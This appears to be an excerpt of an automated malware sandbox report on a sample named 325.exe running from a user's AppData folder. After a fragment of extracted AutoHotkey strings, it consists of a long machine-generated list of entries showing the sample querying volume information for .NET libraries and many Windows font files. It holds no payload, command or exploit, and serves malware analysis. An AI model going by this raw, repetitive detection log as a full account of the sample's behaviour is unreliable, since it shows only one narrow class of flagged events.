meSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
